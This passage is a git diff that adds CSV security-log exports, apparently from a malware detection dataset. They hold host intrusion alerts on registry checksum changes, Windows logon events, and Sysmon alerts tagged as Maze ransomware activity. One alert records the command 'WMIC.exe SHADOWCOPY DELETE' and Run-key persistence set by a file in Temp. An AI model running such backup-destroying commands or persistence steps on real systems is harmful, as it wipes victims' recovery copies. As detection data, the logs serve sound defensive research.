Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", diff --git a/data/MW_15_NIDS.csv b/data/MW_15_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_15_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_16_HIDS_1.csv b/data/MW_16_HIDS_1.csv new file mode 100644 index 0000000..48b1160 --- /dev/null +++ b/data/MW_16_HIDS_1.csv @@ -0,0 +1,47 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 16:50:23.505",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '8da4aa4428657760c7c7976ad92a7c66' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : 'a69b3915170274813d5794c482763769bd34d6ac' +" +"Apr 4, 2020 @ 16:51:26.577",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0b017ce491fd1b22003082d2585a1327' +New md5sum is : '951ed48ea2b16a4b11a3e3fc66e0c792' +Old sha1sum was: 'aba803556e14ebf646bb03cbc539cb30b783ee41' +New sha1sum is : '91243c9a9bc671b7729496f2396ac68cf2ac6a62' +" +"Apr 4, 2020 @ 16:51:40.152",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 4, 2020 @ 16:51:40.171",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '1b931f57450117014d30c4469221616c' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : '065e9af055a9593fc198b9a9efaa6585d80b6af7' +" +"Apr 4, 2020 @ 16:51:49.904",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908' +New md5sum is : '3fa199e01e6129043164b2e1c37f5861' +Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288' +New sha1sum is : 'b4cfc18b446798b6de9db92885752e3473072b1c' +" +"Apr 4, 2020 @ 16:51:56.139",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'ebb35ca0e73314be0a05fef718b695c8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'ba33045457fb2c2633c385785c496d0686356209' +" +"Apr 4, 2020 @ 16:51:56.184",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'ebb35ca0e73314be0a05fef718b695c8' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : 'ba33045457fb2c2633c385785c496d0686356209' +" +"Apr 4, 2020 @ 16:49:36.770",3,"Service startup type was changed", +"Apr 4, 2020 @ 16:49:40.569",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:50:39.101",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:50:45.523",3,"Software Protection service scheduled successfully", diff --git a/data/MW_16_HIDS_2.csv b/data/MW_16_HIDS_2.csv new file mode 100644 index 0000000..852f3ca --- /dev/null +++ b/data/MW_16_HIDS_2.csv @@ -0,0 +1,325 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 14:30:18.236",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:30:17.951",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:30:02.393",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:29:59.266",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +", +"Apr 24, 2020 @ 14:29:58.173",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '19bbf8dd71bfa5e2686e8f7a3a0c5ece' +New md5sum is : '02604b42c1e590131ad4f40243ac694b' +Old sha1sum was: 'ef9ff919614c4fcf38602f898935e4208334a11a' +New sha1sum is : '724609c5f9284f27c9cfdf841fb8717d1997fe89' +", +"Apr 24, 2020 @ 14:29:58.126",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'ed31517f0fcd59fa85673f922c7ec847' +New md5sum is : '8776cf6928f2de374d1a329d7b0948c3' +Old sha1sum was: '8e81e810d1d5de5f44b40f278164e875506e3f8c' +New sha1sum is : '520ae6cd4e088c14c27c500ba09b18024715ec29' +", +"Apr 24, 2020 @ 14:24:23.579",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 14:24:23.549",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 14:23:24.085",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '061d54aa40bae3e7a2f3b77ac146174d' +New md5sum is : '6aa0b509739fb19b5c1aa45c92c254b4' +Old sha1sum was: 'f2ef7500df6b5fad5b6bc115b10a8a5c1c536bc7' +New sha1sum is : '76702d1ce5ed7ccc2f42da73a5e17382d356cf7d' +", +"Apr 24, 2020 @ 14:23:24.078",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4968ffe18e4fa8338000379b041f5f64' +New md5sum is : '9f4ba3c0f3cbcc2a7d50248db63158e2' +Old sha1sum was: 'b02420011da0733a46a9b58282e44f2e7727cde0' +New sha1sum is : 'b5fb4c1b7bb449e167b3422dc978466a999823a4' +", +"Apr 24, 2020 @ 14:22:25.169",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '7dac5cccd517440bbb43bbe2d5c7d13e' +New md5sum is : '19bbf8dd71bfa5e2686e8f7a3a0c5ece' +Old sha1sum was: '72aefb561ab27c0c761a2dd0fc41f9e6b6c997fa' +New sha1sum is : 'ef9ff919614c4fcf38602f898935e4208334a11a' +", +"Apr 24, 2020 @ 14:21:52.481",5,"The VSS service is shutting down due to idle timeout",,"""The VSS service is shutting down due to idle timeout. """ +"Apr 24, 2020 @ 14:20:00.011",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'b92c7d9f88a9158e5c71ec66ce922962' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '1a166cd1c6e9493122d34453abf15a7562755cd6' +", +"Apr 24, 2020 @ 14:19:59.997",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : 'b92c7d9f88a9158e5c71ec66ce922962' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '1a166cd1c6e9493122d34453abf15a7562755cd6' +", +"Apr 24, 2020 @ 14:19:54.902",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908' +New md5sum is : 'a539c0e8e4591e4d2459734ef9aefeee' +Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288' +New sha1sum is : '144fc561ab42d9ebac6c82647f7f6a6e130166b0' +", +"Apr 24, 2020 @ 14:19:46.484",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '061d54aa40bae3e7a2f3b77ac146174d' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'f2ef7500df6b5fad5b6bc115b10a8a5c1c536bc7' +", +"Apr 24, 2020 @ 14:19:46.395",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '4968ffe18e4fa8338000379b041f5f64' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'b02420011da0733a46a9b58282e44f2e7727cde0' +", +"Apr 24, 2020 @ 14:18:53.373",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 14:18:45.984",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1476119 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 24, 2020 @ 14:18:45.671",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +", +"Apr 24, 2020 @ 14:18:44.514",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c2187a169c3e384befba255a66ba663b' +New md5sum is : '7dac5cccd517440bbb43bbe2d5c7d13e' +Old sha1sum was: '55f8bf19c86868d25f922c70184c225fb00e4cc2' +New sha1sum is : '72aefb561ab27c0c761a2dd0fc41f9e6b6c997fa' +", +"Apr 24, 2020 @ 14:18:44.498",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : 'ed31517f0fcd59fa85673f922c7ec847' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : '8e81e810d1d5de5f44b40f278164e875506e3f8c' +", diff --git a/data/MW_16_HIDS_3.csv b/data/MW_16_HIDS_3.csv new file mode 100644 index 0000000..9c12517 --- /dev/null +++ b/data/MW_16_HIDS_3.csv @@ -0,0 +1,104 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 18:10:22.596",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 18:10:22.578",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"May 22, 2020 @ 18:08:20.358",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908' +New md5sum is : '1ae3d45e84e2dee7bf279de1d9e7f413' +Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288' +New sha1sum is : '76a0027224f9d4db6c051bd06678d613cdb05856' +", +"May 22, 2020 @ 18:07:09.728",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 18:06:14.882",15,"ATT&CK T1204: Maze Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:22.077 +ProcessGuid: {df9fc3d3-d15a-5ec7-0000-0010e7fc1800} +ProcessId: 6932 +Image: C:\Windows\SysWOW64\wbem\WMIC.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: WMI Commandline Utility +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: wmic.exe +CommandLine: ""C:\Windows\System32\wbem\WMIC.exe"" SHADOWCOPY DELETE +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300} +LogonId: 0x301DF +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84 +ParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700} +ParentProcessId: 7132 +ParentImage: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe +ParentCommandLine: ""C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe"" ""runas""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:22.099292900Z"",""eventRecordID"":""958"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:22.077\r\nProcessGuid: {df9fc3d3-d15a-5ec7-0000-0010e7fc1800}\r\nProcessId: 6932\r\nImage: C:\\Windows\\SysWOW64\\wbem\\WMIC.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: \""C:\\Windows\\System32\\wbem\\WMIC.exe\"" SHADOWCOPY DELETE\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-0020df010300}\r\nLogonId: 0x301DF\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84\r\nParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700}\r\nParentProcessId: 7132\r\nParentImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\r\nParentCommandLine: \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\"" \""runas\""\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:22.077"",""processGuid"":""{df9fc3d3-d15a-5ec7-0000-0010e7fc1800}"",""processId"":""6932"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WMIC.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""WMI Commandline Utility"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""wmic.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe\\\"" SHADOWCOPY DELETE"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-0020df010300}"",""logonId"":""0x301df"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=F86F3CA37E51F7A6BD352C3A0471ED1E,SHA256=A6ACB58967159648C84D67B06DC6511A9A831386742B4F1F96B0A19AFC8B8037,IMPHASH=C5BFFECCAB78B6F4FD77B28F6F297D84"",""parentProcessGuid"":""{df9fc3d3-d152-5ec7-0000-0010dcc91700}"",""parentProcessId"":""7132"",""parentImage"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe\\\"" \\\""runas\\\""""}}}","\""C:\\Windows\\System32\\wbem\\WMIC.exe\"" SHADOWCOPY DELETE" +"May 22, 2020 @ 18:06:14.295",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:19:19.887 +ProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700} +ProcessId: 7132 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\76F2C2FB-2630A877 +Details: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:19.894655700Z"",""eventRecordID"":""955"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:19:19.887\r\nProcessGuid: {df9fc3d3-d152-5ec7-0000-0010dcc91700}\r\nProcessId: 7132\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\76F2C2FB-2630A877\r\nDetails: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:19:19.887"",""processGuid"":""{df9fc3d3-d152-5ec7-0000-0010dcc91700}"",""processId"":""7132"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\76F2C2FB-2630A877"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\svcawa.exe""}}}", +"May 22, 2020 @ 18:06:02.162",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:19:09.038 +ProcessGuid: {df9fc3d3-d147-5ec7-0000-00100b611500} +ProcessId: 3980 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\76F2C2FB-2630A877 +Details: C:\Users\JOHNWI~1\AppData\Local\Temp\svcawa.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:09.046721100Z"",""eventRecordID"":""940"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:19:09.038\r\nProcessGuid: {df9fc3d3-d147-5ec7-0000-00100b611500}\r\nProcessId: 3980\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\svcawa.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\76F2C2FB-2630A877\r\nDetails: 